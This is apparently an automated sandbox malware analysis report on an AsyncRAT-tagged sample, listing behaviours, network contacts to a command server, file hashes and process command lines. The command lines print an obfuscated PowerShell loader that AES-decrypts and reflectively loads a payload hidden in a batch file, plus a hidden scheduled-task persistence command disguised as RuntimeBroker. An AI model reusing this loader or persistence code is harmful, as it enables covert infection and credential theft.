Description	Indicator	Process	Target
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	C:\Users\Admin\Desktop\startup_str_240.bat.exe	N/A
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	C:\Windows\System32\WScript.exe	N/A

Executes dropped EXE

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

Modifies registry class

Description	Indicator	Process	Target
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	C:\Users\Admin\Desktop\startup_str_240.bat.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	C:\Windows\system32\cmd.exe	N/A
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	C:\Windows\system32\OpenWith.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	N/A
N/A	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	N/A
N/A	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeRestorePrivilege	N/A	C:\Program Files\7-Zip\7zFM.exe	N/A
Token: 35	N/A	C:\Program Files\7-Zip\7zFM.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Program Files\7-Zip\7zFM.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 33	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 34	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 35	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 36	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 33	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 34	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 35	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: 36	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Suspicious use of FindShellTrayWindow

Description	Indicator	Process	Target
N/A	N/A	C:\Program Files\7-Zip\7zFM.exe	N/A
N/A	N/A	C:\Program Files\7-Zip\7zFM.exe	N/A

Suspicious use of SetWindowsHookEx

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\system32\OpenWith.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 3332 wrote to memory of 4104	N/A	C:\Windows\system32\cmd.exe	C:\Users\Admin\Desktop\startup_str_240.bat.exe
PID 3332 wrote to memory of 4104	N/A	C:\Windows\system32\cmd.exe	C:\Users\Admin\Desktop\startup_str_240.bat.exe
PID 4104 wrote to memory of 3244	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 3244	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 4352	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 4352	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4104 wrote to memory of 1584	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	C:\Windows\System32\WScript.exe
PID 4104 wrote to memory of 1584	N/A	C:\Users\Admin\Desktop\startup_str_240.bat.exe	C:\Windows\System32\WScript.exe
PID 1584 wrote to memory of 3020	N/A	C:\Windows\System32\WScript.exe	C:\Windows\system32\cmd.exe
PID 1584 wrote to memory of 3020	N/A	C:\Windows\System32\WScript.exe	C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2316	N/A	C:\Windows\system32\cmd.exe	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe
PID 3020 wrote to memory of 2316	N/A	C:\Windows\system32\cmd.exe	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe
PID 2316 wrote to memory of 4636	N/A	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2316 wrote to memory of 4636	N/A	C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Files.7z

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Files.7z"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\startup_str_240.bat" "

C:\Users\Admin\Desktop\startup_str_240.bat.exe

"startup_str_240.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_uhLDX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\startup_str_240.bat').Split([Environment]::NewLine);foreach ($_A_fLlBB in $_A_uhLDX) { if ($_A_fLlBB.StartsWith(':: @')) { $_A_NbTKf = $_A_fLlBB.Substring(4); break; }; };$_A_NbTKf = [System.Text.RegularExpressions.Regex]::Replace($_A_NbTKf, '_A_', '');$_A_WVlpt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_NbTKf);$_A_Nltui = New-Object System.Security.Cryptography.AesManaged;$_A_Nltui.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_Nltui.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_Nltui.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lGuXRwARexqT9x64aF65VNd3vz0xg4bu9gRf+fDmuaA=');$_A_Nltui.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoqVYFCFIwzuGh66WuDKhQ==');$_A_jhFfk = $_A_Nltui.CreateDecryptor();$_A_WVlpt = $_A_jhFfk.TransformFinalBlock($_A_WVlpt, 0, $_A_WVlpt.Length);$_A_jhFfk.Dispose();$_A_Nltui.Dispose();$_A_UQaMS = New-Object System.IO.MemoryStream(, $_A_WVlpt);$_A_gYDat = New-Object System.IO.MemoryStream;$_A_LiXRH = New-Object System.IO.Compression.GZipStream($_A_UQaMS, [IO.Compression.CompressionMode]::Decompress);$_A_LiXRH.CopyTo($_A_gYDat);$_A_LiXRH.Dispose();$_A_UQaMS.Dispose();$_A_gYDat.Dispose();$_A_WVlpt = $_A_gYDat.ToArray();$_A_DYwut = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_WVlpt);$_A_AkCGN = $_A_DYwut.EntryPoint;$_A_AkCGN.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\Desktop\startup_str_240')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_181_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_181.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_181.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_181.bat" "

C:\Users\Admin\AppData\Roaming\startup_str_181.bat.exe

"startup_str_181.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_uhLDX = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_181.bat').Split([Environment]::NewLine);foreach ($_A_fLlBB in $_A_uhLDX) { if ($_A_fLlBB.StartsWith(':: @')) { $_A_NbTKf = $_A_fLlBB.Substring(4); break; }; };$_A_NbTKf = [System.Text.RegularExpressions.Regex]::Replace($_A_NbTKf, '_A_', '');$_A_WVlpt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_NbTKf);$_A_Nltui = New-Object System.Security.Cryptography.AesManaged;$_A_Nltui.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_Nltui.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_Nltui.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lGuXRwARexqT9x64aF65VNd3vz0xg4bu9gRf+fDmuaA=');$_A_Nltui.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uoqVYFCFIwzuGh66WuDKhQ==');$_A_jhFfk = $_A_Nltui.CreateDecryptor();$_A_WVlpt = $_A_jhFfk.TransformFinalBlock($_A_WVlpt, 0, $_A_WVlpt.Length);$_A_jhFfk.Dispose();$_A_Nltui.Dispose();$_A_UQaMS = New-Object System.IO.MemoryStream(, $_A_WVlpt);$_A_gYDat = New-Object System.IO.MemoryStream;$_A_LiXRH = New-Object System.IO.Compression.GZipStream($_A_UQaMS, [IO.Compression.CompressionMode]::Decompress);$_A_LiXRH.CopyTo($_A_gYDat);$_A_LiXRH.Dispose();$_A_UQaMS.Dispose();$_A_gYDat.Dispose();$_A_WVlpt = $_A_gYDat.ToArray();$_A_DYwut = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_WVlpt);$_A_AkCGN = $_A_DYwut.EntryPoint;$_A_AkCGN.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_181')

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	13.86.106.20.in-addr.arpa	udp
US	8.8.8.8:53	68.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	241.150.49.20.in-addr.arpa	udp
NL	23.62.61.194:443	www.bing.com	tcp
US	8.8.8.8:53	205.47.74.20.in-addr.arpa	udp
US	8.8.8.8:53	194.61.62.23.in-addr.arpa	udp
US	8.8.8.8:53	183.142.211.20.in-addr.arpa	udp
US	8.8.8.8:53	86.23.85.13.in-addr.arpa	udp
US	8.8.8.8:53	206.23.85.13.in-addr.arpa	udp
US	8.8.8.8:53	new22.vpndns.net	udp
DE	94.130.130.51:116	new22.vpndns.net	tcp
US	8.8.8.8:53	51.130.130.94.in-addr.arpa	udp
DE	94.130.130.51:116	new22.vpndns.net	tcp

Files

C:\Users\Admin\Desktop\startup_str_240.bat

MD5	02dce5d2f3da53f3bfa165bfb6372c53
SHA1	699f6a7fde4aa873a4499bdefb3e9bd2c180cc86
SHA256	0cc0e3fe599b7bd362dd160efafaefd26c692934682cc13e12575c05aa028a99
SHA512	cf78595e03f9a65514b5e4b15bf40b204568fad2d956bfbaddd513349df28b8b37ed18d6ca3f7724ab765ea6ca34ff493b427e424a2b7bd2b33206ad871acbc3

C:\Users\Admin\Desktop\startup_str_240.bat.exe

MD5	04029e121a0cfa5991749937dd22a1d9
SHA1	f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256	9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512	6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/4104-11-0x00000170417B0000-0x00000170417D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4yhpgugb.kkr.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4104-19-0x0000017041B80000-0x0000017041DD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5	661739d384d9dfd807a089721202900b
SHA1	5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256	70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512	81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	f3b2f7c8e9b3057a4342efce5cb1f648
SHA1	cbcab1b48cd397259c504d2c915c5c30ea877b06
SHA256	2c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693
SHA512	f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	75b4b2eecda41cec059c973abb1114c0
SHA1	11dadf4817ead21b0340ce529ee9bbd7f0422668
SHA256	5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA512	87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

C:\Users\Admin\AppData\Roaming\startup_str_181.vbs

MD5	47494d2160f5389d7933766312b12d8a
SHA1	0fbf0f34250407171a6b9355d45432f9123f77da
SHA256	c2d635edf26922d3c1d0bbd1812aaa86da10ab60bc8f85a3c962b97c2b3be2e2
SHA512	680b86046afdd5d0c0f7ed30de2a0bf128aa50820968bb5d5f00c06ea351c4accfb2e7d0ceb9ba8768c63a0dc90065b8f670805bed02e5c749bc513ce08fedbe

memory/2316-78-0x000001AC5A260000-0x000001AC5A276000-memory.dmp

Malware Analysis Report

2024-08-06 12:58

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

Malicious Activity Summary

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Sample ID	240605-qhxcsagd6s
Target	Files.7z
SHA256	54d46fbfeb589b2847878580392ae4aff98a0c59b0731541e311f5718023688d
Tags	asyncrat rfu execution rat spyware stealer